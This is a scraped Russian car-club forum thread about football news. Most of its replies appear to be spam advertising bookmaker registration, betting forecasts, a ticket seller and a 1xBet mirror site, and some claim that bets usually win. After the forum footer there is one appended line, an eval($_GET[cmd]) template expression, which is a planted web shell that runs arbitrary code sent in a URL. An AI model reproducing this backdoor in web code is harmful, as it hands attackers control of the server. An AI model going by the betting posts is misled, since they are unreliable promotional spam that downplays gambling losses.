+ Ответить в теме
Показано с 1 по 9 из 9

Тема: Футбол


  1. #1
    Мимо проходил Уточка is on a distinguished road Аватар для Уточка
    Регистрация
    08.03.2019
    Откуда
    Россия
    Машина
    Авто
    Сообщений
    1

    Футбол

    Здравствуйте. Хочу новости почитать, посвящённые футболу и пока только просматриваю в интернете статьи, которые помогут мне сориентироваться и прогуляться по сайтам, чтобы ознакомиться с информацией онлайн. Вы обычно также делаете?

  2. #2
    Мимо проходил Милания is on a distinguished road Аватар для Милания
    Регистрация
    25.09.2019
    Откуда
    Россия
    Машина
    Мерс
    Сообщений
    1
    Цитата Сообщение от Уточка Посмотреть сообщение
    Здравствуйте. Хочу новости почитать, посвящённые футболу и пока только просматриваю в интернете статьи, которые помогут мне сориентироваться и прогуляться по сайтам, чтобы ознакомиться с информацией онлайн. Вы обычно также делаете?
    Всем привет. Да и могу вам посоветовать прогуляться для начала по сайту, на котором размещены последние футбольные новости, посвящённые разным мировым чемпионатам. Здесь https://www.footboom.com/betting/forecast обновления каждый день, прогнозы и видео фрагменты матчей, которые недавно только состоялись. В любом случае, удобная фишка, не нужно посещать какие-то сайты, достаточно на одном остановить свой выбор и добавить ссылку в закладки, чтобы потом не потерять её.

  3. #3
    Мимо проходил Rita25 is on a distinguished road Аватар для Rita25
    Регистрация
    26.11.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    22
    Обязательно изучаю все актуальные новости футбола, я делаю ставки и не рассчитываю на удачу, стараюсь мониторить всю свежую информацию. Вот хороший сайт https://footballhd.ru , здесь все самые свежие новости, постоянно обновляют, мне очень удобно изучать информацию здесь , все по разделам и поиск есть

  4. #4
    Мимо проходил Nikitoss is on a distinguished road Аватар для Nikitoss
    Регистрация
    21.07.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    36
    А я после просмотра матчей сразу делаю ставки. Тем более, что чаще всего они выигрывают и я могу сразу вывести деньги. Ну а кто еще не в теме, советую присоединяться и регистрироваться в одной из бк https://bookmaker-reg.info/ , ведь там можно отлично развлечься и отдохнуть от ежедневной работы и суеты.

  5. #5
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    ребята, а кто может подсказать хорошие варианты покупки билетов на футбол онлайн?

  6. #6
    GTI-Racing Maxxxx is on a distinguished road Аватар для Maxxxx
    Регистрация
    08.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    383
    Цитата Сообщение от Felhaghma Посмотреть сообщение
    ребята, а кто может подсказать хорошие варианты покупки билетов на футбол онлайн?
    Встретил на улице по пути с работы приятеля, рассказал, что имею сложности с покупкой билетов на ФК ЦСКА , так как нет времени ходить по городским кассам. Он предложил воспользоваться услугами на сайте, чтобы заказать билеты. У них заказал билеты на 14 мая 2023 ЦСКА ПФК — Торпедо Москва, сектор 217 стоит 3500 рублей, выбрал его, как лучший.

  7. #7
    Новичок Rusik23 is on a distinguished road Аватар для Rusik23
    Регистрация
    25.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    179
    Цитата Сообщение от Felhaghma Посмотреть сообщение
    ребята, а кто может подсказать хорошие варианты покупки билетов на футбол онлайн?
    Я купил билеты на футбол на ВЭБ Арену на https://veb-arena-cska.com/ и остался очень доволен своим выбором. Это был незабываемый опыт - отличное место для просмотра матча, великолепная атмосфера и высокое качество организации. Кроме того, процесс покупки билетов был простым и быстрым, и я могу с уверенностью рекомендовать veb-arena-cska.com всем, кто хочет посетить футбольный матч на ВЭБ Арене.

  8. #8
    GTI-Racing Nikolas75 is on a distinguished road Аватар для Nikolas75
    Регистрация
    26.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    978
    я читаю аналитику и прогнозы
    Последний раз редактировалось Nikolas75; 29.11.2023 в 16:04.

  9. #9
    GTI-Racing Nikolas75 is on a distinguished road Аватар для Nikolas75
    Регистрация
    26.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    978
    Советую Вам выделить немного свободного времени, и изучить вот на этом ресурсе обзоры букмекерских контор рабочее 1хбет зеркало . Только так Вы сможете найти ту, у которой условия будут наилучшими. Времени на это много не уйдёт.

+ Ответить в теме

Похожие темы

  1. Тотал на футбол
    от Kurdt в разделе Барахолка
    Ответов: 3
    Последнее сообщение: 03.04.2024, 02:07
  2. Футбол
    от StRoNgMan4 в разделе Клубная Тема
    Ответов: 5
    Последнее сообщение: 27.02.2020, 10:15
  3. Футбол с Гольф клубом
    от КИБАЛЬЧИШЬ в разделе Курилка
    Ответов: 1
    Последнее сообщение: 11.03.2011, 16:39
  4. Футбол с ГольфКлубом
    от КИБАЛЬЧИШЬ в разделе Курилка
    Ответов: 11
    Последнее сообщение: 13.08.2010, 10:13
  5. Футбол
    от Gomkv в разделе Украина
    Ответов: 14
    Последнее сообщение: 09.05.2009, 13:09

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}